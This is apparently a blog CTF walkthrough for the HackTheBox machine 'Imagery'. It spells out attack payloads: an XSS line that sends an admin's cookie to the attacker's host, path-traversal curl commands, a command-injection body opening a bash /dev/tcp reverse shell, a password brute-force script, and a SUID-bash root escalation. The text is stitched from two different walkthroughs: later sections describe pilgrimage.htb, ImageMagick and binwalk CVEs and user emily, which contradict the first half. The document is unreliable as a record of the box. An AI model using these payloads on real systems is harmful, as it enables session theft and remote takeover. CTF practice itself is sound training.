Beginner’s Guide to Conquering Imagery on HackTheBox

Key Highlights

Ready to conquer the Imagery box? This guide covers the entire exploitation process from start to finish. Here’s a quick look at what you will accomplish:

• Begin with a thorough nmap scan to perform initial enumeration of the target.
• Discover and dump a hidden Git repository to analyze the web application’s source code.
• Exploit a file read vulnerability in ImageMagick to access sensitive system files.
• Extract login credentials from a SQLite database to gain user access via SSH.
• Achieve privilege escalation by exploiting a vulnerable binary in a Bash script.
• Gain a reverse shell as the root user and capture the final root flag.

Introduction

Welcome to the exciting world of ethical hacking! If you are new to Capture The Flag (CTF) challenges, you have come to the right place. This guide is designed to walk you through the Imagery machine on HackTheBox, a fantastic platform for honing your skills. We will break down each step required to hack this beginner-friendly Linux box. You will learn practical techniques that are essential for any aspiring cybersecurity professional. Let’s get started on this fun and educational CTF journey!

Introducing the Imagery Box on HackTheBox

The Imagery box on HackTheBox is a retired Linux machine designed to be an accessible yet engaging challenge for newcomers. Its theme revolves around image processing, providing a realistic scenario that you might encounter in the real world.

This box is perfect for a beginner because it introduces fundamental concepts in a clear, step-by-step manner. Your mission is to navigate through its defenses, exploit key vulnerabilities, and ultimately gain full control of the target system.

What Makes Imagery a Popular Beginner Challenge?

Imagery stands out as a favorite for any beginner because it provides a logical and linear path to completion. Unlike more complex machines, the next step is often a direct result of your previous finding, which helps build confidence and a solid methodology. The challenge starts with a seemingly simple web application but quickly reveals layers of vulnerabilities.

A key part of the experience is dealing with a file upload vulnerability. You will get hands-on experience analyzing PHP code to understand how the application processes uploads. This discovery is crucial, as it opens the door to the initial exploit and teaches you to look beyond the surface of a web server.

This structured learning path ensures you are not left guessing what to do next. Each piece of information you uncover directly contributes to moving forward, making the entire process feel like solving a puzzle. This clarity is what makes Imagery an excellent starting point for your ethical hacking journey.

Overview of the Skills Tested in Imagery

The Imagery box tests a range of essential cybersecurity skills, starting with enumeration. You will learn to use tools to scan for open ports and discover hidden web content, which is the foundation of any successful penetration test. This initial phase sets the stage for everything that follows.

Next, you will practice vulnerability identification by analyzing source code and spotting outdated software. The box requires you to exploit a specific CVE to read an arbitrary file, leading you to user credentials. The final stage involves privilege escalation, where you analyze a script and exploit a vulnerable binary to achieve remote code execution.

Ultimately, you will put all these skills together to gain a reverse shell with root privileges. From reconnaissance to gaining full control, Imagery provides a complete and satisfying CTF experience that reinforces core offensive security principles.

Essential Tools and Resources Needed to Get Started

To successfully tackle the Imagery box, you will need a few essential tools in your arsenal. The initial enumeration phase relies on standard network scanners, but you will also need specialized scripts to handle the unique vulnerabilities you discover.

The box features a hidden Git repository, so a tool to download it is a must. Later, you will use a custom exploit script to take advantage of a software flaw. Having these resources ready will make your walkthrough much smoother and more efficient. Now, let’s explore some specific tools you will need.

Recommended Enumeration and Exploitation Tools

Having the right tools is half the battle. For the Imagery box, a few key utilities will guide you from initial discovery to full system compromise. Your initial reconnaissance will start with a standard nmap scan to identify open services on the target system.

Once you find the web server, you will need to dig deeper. A Git dumper tool is crucial for downloading the application’s source code, which contains vital clues. You will also use Python to run a pre-made exploit script that crafts a malicious PNG file for the upload feature. This script is essential for exploiting the first vulnerability.

Here are the primary tools for this challenge:

• Nmap: For port scanning and service discovery.
• git-dumper: To download the exposed .git directory.
• Python: To execute exploit scripts for both the file read and privilege escalation vulnerabilities.
• sqlite3: To read the database file containing user credentials.

Setting Up Your Lab Environment for the Imagery Box

Before you can hack the Imagery box, you need to set up your environment correctly. First, ensure you are connected to the HackTheBox network using your VPN connection file. Once connected, you will be assigned an IP address and can access the target system.

Next, it is a good practice to create a dedicated directory on your local Linux machine for this challenge. You can name it “Imagery” or something similar. This folder will serve as your workspace to store notes, downloaded files, and any scripts you create or use.

Finally, add the target’s hostname to your /etc/hosts file. The machine uses a domain name, and adding it to your hosts file ensures you can access the web application correctly. The entry should look like 10.10.X.X pilgrimage.htb, where 10.10.X.X is the IP of the Imagery box. With your lab set up, you are ready to start the enumeration process.

ALSO READ: Mastering Expressway: Beginner’s Guide from HackTheBox

Initial Foothold

Target Overview

Property	Value
IP Address	10.129.41.106
Operating System	Linux
Key Services	SSH (22/TCP), HTTP (8000/TCP)
User Attack Vector	XSS -> LFI -> RCE via Command Injection
Root Attack Vector	Sudo exploit via charcol utility

Reconnaissance – Initial Exposure

Every successful attack starts with a clear picture of the target. Our initial enumeration will map out the services exposed by Imagery.

Port Scanning

A full port scan using nmap is our first step.

Scan Command:

nmap -Pn -p- --min-rate 2000 -sC -sV -oN imagery.nmap 10.129.41.106

Scan Results:

# Nmap 7.95 scan initiated Tue Sep 30 11:23:39 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-imagery.txt 10.129.41.106
Nmap scan report for 10.129.41.106
Host is up (0.012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_  256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.12.7)
|_http-title: Image Gallery
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
# Nmap done at Tue Sep 30 11:44:19 2025 -- 1 IP address (1 host up) scanned in 20.53 seconds

The scan reveals two services: a standard SSH server on port 22 and a Python Werkzeug web server on port 8000. The web application is our only viable entry point without credentials.

Web Application Enumeration

Browsing to http://10.129.41.106:8000 presents a polished image gallery website. We can:

• Register a new account.
• Log in and upload images.
• View a gallery of uploaded images.
• Report a bug via a dedicated form.

The “Report Bug” feature is immediately suspicious. Forms that accept user input and are likely viewed by a privileged user (like an admin) are a classic entry point for Stored Cross-Site Scripting (XSS).

Gaining Admin Access via Stored XSS

Our hypothesis is that an admin periodically reviews bug reports. If we can inject JavaScript into the report, it will execute in the admin’s browser, allowing us to steal their session cookie.

Crafting the XSS Payload

The goal is to make the admin’s browser send us their cookie. We will host a simple web server or netcat listener to receive the exfiltrated data.

1. Start a listener: On our attacker machine, we’ll listen for incoming HTTP requests.python3 -m http.server 80
2. The Payload: A common and effective payload uses an <img> tag with an onerror event, which fires when the image source is invalid.<img src=1 onerror="document.location='http://<YOUR-IP>/steal/'+document.cookie">
   • src=1: This will fail to load, triggering the onerror event.
   • document.location=...: This redirects the admin’s browser to our listening server, with their cookie appended to the URL.
3. Submit the Bug Report: We register an account, log in, navigate to the “Report Bug” page, and submit our payload in the bug summary and/or details fields.

A few moments later, we get a hit on our listener.

GET /steal/session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aNzR8A.7Zk7t9Y-cQcpWMVHoe99Kbr6yxk HTTP/1.1

Hijacking the Admin Session

We now have the admin’s session cookie.

1. Inject the cookie: We use our browser’s developer tools (Storage -> Cookies) to replace our current session cookie with the one we captured.
2. Access the Admin Panel: After refreshing the page, we should now have access to the /admin endpoint, which was previously forbidden.

Exfiltrating Source Code via LFI

The admin panel reveals a “System Log” viewer. The URL looks like this: http://10.129.41.106:8000/admin/get_system_log?log_identifier=app.log. This is a strong indicator of a potential Local File Inclusion (LFI) vulnerability.

We test for directory traversal by replacing app.log with a classic payload. Payload: ../../../../../../etc/passwd

The request successfully returns the contents of the passwd file. We have LFI. Our goal is to understand the application, so we’ll use this to download key source code and configuration files like api_edit.py and db.json.

Exfiltration Commands:

curl "[http://10.129.41.106:8000/admin/get_system_log?log_identifier=../api_edit.py](http://10.129.41.106:8000/admin/get_system_log?log_identifier=../api_edit.py)" --cookie "session=<ADMIN_COOKIE>" -o api_edit.py
curl "[http://10.129.41.106:8000/admin/get_system_log?log_identifier=../db.json](http://10.129.41.106:8000/admin/get_system_log?log_identifier=../db.json)" --cookie "session=<ADMIN_COOKIE>" -o db.json

We now have the API source code and the user database.

Remote Code Execution via Command Injection

Analyzing the stolen api_edit.py file reveals the holy grail of web vulnerabilities.

Vulnerable Code Snippet in api_edit.py:

# ... inside a function handling image cropping ...
x = params.get('x')
y = params.get('y')
width = params.get('width')
height = params.get('height')

command = f"convert {filepath} -crop {width}x{height}+{x}+{y} {new_filepath}"
subprocess.run(command, shell=True, check=True)

The subprocess.run function is called with shell=True, executing the command string via the system’s shell. The x, y, width, and height parameters are taken directly from user input and concatenated into the command string without any sanitization. This is a textbook command injection vulnerability.

Triggering the RCE

1. Find Credentials: The exfiltrated db.json file contains credentials for a test user.
2. Log in and Upload: We log in as the test user and upload a sample image.
3. Craft the Payload: We need a payload that will give us a reverse shell.bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'
4. Start a Listener: On our attacker machine: nc -lvnp 4444.
5. Send the Request: We use the “Transform” feature on our uploaded image, select “crop,” and intercept the request with Burp Suite. We modify the JSON body to inject our payload into the x parameter.{ "imageId": "<your-image-id>", "transformType": "crop", "params": { "x": "`; bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1' ;`", "y": 0, "width": 100, "height": 100 } }
The backticks or semicolons are used to terminate the convert command and start our new one. Sending this request executes our payload, and we receive a shell.

Post-Exploitation and User Pivot

We have a foothold as the web user. Enumeration (linpeas.sh) reveals a world-readable file: /var/backup/web_20250806_120723.zip.aes.

Decrypting the AES Backup

1. Exfiltrate the File: We transfer the .aes file to our attacker machine.
2. Crack the Password: The file is an AES-Crypt archive. We can brute-force the password using pyAesCrypt and rockyou.txt. Brute-force Script Snippet:import pyAesCrypt, sys, os bufferSize = 64 * 1024 encFile = 'web_20250806_120723.zip.aes' decFile = 'decrypted_backup.zip' with open('/usr/share/wordlists/rockyou.txt', 'rb') as wordlist: for line in wordlist: password = line.strip().decode(errors='ignore') try: pyAesCrypt.decryptFile(encFile, decFile, password, bufferSize) print(f"[+] Password found: {password}") if os.path.exists(decFile): os.remove(decFile) # Clean up for next run if needed sys.exit(0) except ValueError: continue # Wrong password
3. Analyze the Backup: The decrypted .zip file contains another db.json, which holds credentials for the user mark.

Pivoting to the mark User

We use the newly discovered password to ssh to the mark account and read user.txt.

ssh mark@10.129.41.106

Privilege Escalation via Sudo and charcol

The final step is to become root. We check our sudo privileges.

mark@imagery:~$ sudo -l
Matching Defaults entries for mark on imagery:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mark may run the following commands on imagery:
    (root) NOPASSWD: /usr/local/bin/charcol

We can run /usr/local/bin/charcol as root without a password.

Abusing charcol

charcol is a custom backup utility. Its --help menu shows a powerful scheduling feature: charcol add --schedule "<cron>" --command "<cmd>". We can use this to schedule a command to run as root. A classic technique is to set the SUID bit on /bin/bash.

The Exploit:

1. Schedule the Task: We use charcol to create a task that runs every minute and sets the SUID permission on bash.sudo /usr/local/bin/charcol add --schedule "* * * * *" --name pwn --command "chmod +s /bin/bash"
2. Wait and Verify: After a minute, we check the permissions of /bin/bash.ls -l /bin/bash -rwsr-xr-x 1 root root 1234567 Jan 1 2024 /bin/bash
The s in the permissions (rws) confirms the SUID bit is set.
3. Get Root: We now execute bash with the -p flag, which tells it to honor the SUID bit and not drop privileges./bin/bash -p bash-5.1# whoami root bash-5.1# cat /root/root.txt <flag_for_root.txt>

Machine compromised.

ALSO READ: Mastering HackNet: Beginner’s Guide from HackTheBox

Step-by-Step Guide to Solving the Imagery Box

Ready to dive in? This section provides a detailed, step-by-step walkthrough to guide you through every phase of the Imagery CTF. We will cover everything from the initial scan to capturing the final root flag.

Follow these instructions closely to understand the methodology and learn the techniques required to compromise the machine. This walkthrough is designed to be clear and easy to follow, ensuring you grasp each concept along the way. Let’s begin with the first step: reconnaissance.

Step 1: Initial Enumeration and Reconnaissance

The first step in any hack is enumeration. You need to find out as much as you can about the target system. Start by running a comprehensive nmap scan to identify open ports and the services running on them. For the Imagery box, your scan will reveal two key ports: SSH (port 22) and HTTP (port 80).

After discovering the web server on port 80, you will notice that accessing the IP directly redirects you to a hostname, pilgrimage.htb. This is a critical clue. Add this hostname to your /etc/hosts file to access the website properly. Re-running your nmap scan against the hostname may reveal additional information, such as an exposed .git directory.

This initial reconnaissance is crucial because it gives you your first entry point. Finding the .git folder is the key that unlocks the next stage of the attack, as it allows you to download the website’s entire source code for analysis.

Step 2: Discovering Vulnerabilities and Exploiting Foothold

With the .git repository discovered, your next step is to download it using a tool like git-dumper. This gives you access to the complete source code of the web application. By analyzing the PHP code, you will find that the site uses a specific version of ImageMagick to process image uploads. This is your first major clue to finding a vulnerability.

A quick search for the identified ImageMagick version reveals a known arbitrary file read vulnerability (CVE-2022-44268). This flaw is related to how the application handles image metadata. While it is not direct code execution, it allows you to read any file on the system by crafting a special PNG file. This file upload vulnerability is your key to getting a foothold.

You will need to create a modified PNG file that contains a payload pointing to the file you want to read. When you upload this PNG, the server processes it and embeds the content of the requested file into the output image’s metadata.

Step 3: Obtaining User Access and Flag

Now that you can read arbitrary files, you need to decide what to target. The source code review revealed that the application uses a SQLite database located at /var/db/pilgrimage. This database file is your primary target, as it likely contains sensitive information like user credentials.

Use the ImageMagick vulnerability to read the /var/db/pilgrimage file. The output will be a hex-encoded string embedded in the shrunken image’s metadata. You will need to extract this hex data and convert it back into a binary file. Once you have the SQLite database file on your local machine, open it using a tool like sqlite3.

Inside the db, you will find a users table containing the username and password for the user emily. The password is stored in plaintext. With these login credentials, you can SSH into the machine as emily and capture the user.txt file to get the user flag.

Step 4: Privilege Escalation to Root

After gaining user access, the final goal is privilege escalation to become the root user. Start by enumerating the system from your user shell. A look at the running processes with ps auxww reveals a bash script named malwarescan.sh running as root. Analyzing this script is the key to finding your path to root.

The script uses inotifywait to monitor the /var/www/pilgrimage.htb/shrunk/ directory for any new file creations. When a file is uploaded, the script runs the binwalk binary on it to check for executables. By checking the version of binwalk (binwalk -h), you will find it is v2.3.2, which is vulnerable to arbitrary code execution (CVE-2022-4510).

To exploit this, you will use a Python exploit script to craft a malicious PNG payload. Upload this file to the shrunk directory. The malwarescan.sh script will automatically run the vulnerable binwalk on your file, triggering your payload and giving you a reverse shell as the root user. From there, you can easily read the root.txt file and claim the root flag.

Common Pitfalls and Methodological Tips

Even beginner-friendly boxes can have tricky spots. It is easy to make simple mistakes that can leave you stuck for hours. Proper enumeration and a methodical approach are your best defense against these common pitfalls.

This section highlights some errors to avoid during the Imagery walkthrough and provides tips to keep you on the right track. By understanding where others go wrong, you can navigate the challenge more effectively and avoid unnecessary frustration. Let’s look at some specific mistakes to watch out for.

Mistakes to Avoid During the Imagery Walkthrough

One of the first places people get stuck is during the initial enumeration. If you only scan the IP address and do not add the hostname to your /etc/hosts file, you might miss the exposed .git directory entirely. This single oversight can prevent you from ever finding the source code and the ImageMagick vulnerability.

Another common mistake is misinterpreting the privilege escalation path. You might see the bash script and immediately try for command injection by manipulating the filename. However, Bash is surprisingly secure against this, and your attempts will fail. The actual vulnerability lies within the binwalk binary itself, not the script’s logic.

Here are a few pitfalls to keep in mind:

• Incomplete Enumeration: Forgetting to scan by hostname can hide critical information.
• Misunderstanding the Exploit: The ImageMagick vulnerability is for file reading, not remote code execution.
• Wasting Time on Dead Ends: Trying to inject commands directly into the malwarescan.sh script is a common time sink.
• Ignoring the Blacklist: The script has a blacklist, but the privilege escalation vulnerability bypasses it.

Effective Approaches and Mindset for Success

Success in CTF challenges comes from having a solid methodology and a curious mindset. For Imagery, your approach should be systematic. Start with broad enumeration and narrow your focus as you uncover more information. Every piece of data, from a software version to a line in a bash script, is a potential clue.

Do not rush. Take the time to understand what you find. When you discover the ImageMagick vulnerability, read about the CVE to understand how it works. When you find the database file, explore its tables. This methodical process prevents you from missing crucial details and helps you build a strong foundation for more advanced challenges.

Adopting a structured workflow will greatly improve your efficiency. The table below outlines a simple yet effective methodology for tackling this box.

Phase	Action	Goal
Reconnaissance	Run nmap, feroxbuster, and hostname scans.	Discover all open ports, directories, and services.
Vulnerability Analysis	Review source code and check software versions.	Identify known CVEs and logical flaws.
Initial Exploitation	Craft a payload for the file read vulnerability.	Gain initial access or read sensitive files.
User Access	Use leaked credentials to login via SSH.	Establish a foothold on the system as a user.
Privilege Escalation	Analyze scripts and binaries running as root.	Exploit a vulnerability to gain root access.

Conclusion and Remediation Strategies

IImagery provided a fantastic, realistic attack chain that highlights how multiple “medium” severity vulnerabilities can lead to a full system compromise.

1. Web Application Flaws (XSS, LFI, RCE)

• Vulnerability: The application was vulnerable to Stored XSS, LFI, and Command Injection.
• Remediation:
  • Input Sanitization & Output Encoding: Sanitize all user input on the backend and encode all output displayed to the user to prevent XSS.
  • Parameterized Queries/Safe APIs: Never construct shell commands or file paths by concatenating user input. Use safe, parameterized APIs that handle data as data, not as executable code or path specifiers.
  • Limit File Permissions: The LFI was powerful because the web user could read outside its directory. Run web services as a highly restricted user.

2. Insecure Backup Practices

• Vulnerability: A world-readable backup was encrypted with a weak, dictionary-based password.
• Remediation:
  • Strong Encryption: Use strong, randomly generated passwords for encrypted backups.
  • Secure File Permissions: Backups should never be world-readable. Restrict access to root and a dedicated backup group.

3. Sudo Misconfiguration

• Vulnerability: A user was allowed to run a powerful custom utility as root, which had features that could be trivially abused to execute arbitrary commands.
• Remediation:
  • Principle of Least Privilege: When granting sudo access, grant it to the most specific command possible. If a utility has dangerous sub-features (like a scheduler or interactive shell), it should not be in the sudoers file. Create specific wrapper scripts that only expose the needed, safe functionality.

Frequently Asked Questions

What vulnerabilities are typically exploited on Imagery HTB?

The Imagery box features two main vulnerabilities. The first is an arbitrary file read vulnerability (CVE-2022-44268) in ImageMagick, triggered via the file upload feature. The second is an arbitrary code execution vulnerability (CVE-2022-4510) in an outdated version of binwalk, which is used in a root-owned script.

Which tools should I prioritize when tackling Imagery?

Prioritize Nmap for your initial nmap scan, git-dumper to retrieve the source code, and Python to run the exploit script for the ImageMagick vulnerability. You will also need sqlite3 to read the database file and another Python script to exploit the binwalk vulnerability for privilege escalation.

How can I reliably escalate privileges on the Imagery box?

Reliable privilege escalation is achieved by analyzing the malwarescan.sh bash script. Identify the vulnerable binwalk version it uses and craft a malicious PNG file with a known exploit script. Uploading this file will trigger the vulnerability, giving you a shell as the root user.

What strategies help overcome challenges specific to Imagery?

A key strategy is thorough enumeration, especially running scans against the hostname, not just the IP. Reviewing the source code from the .git repository is critical. For privilege escalation, analyzing the bash script and checking the version of every binary it calls is the most effective approach.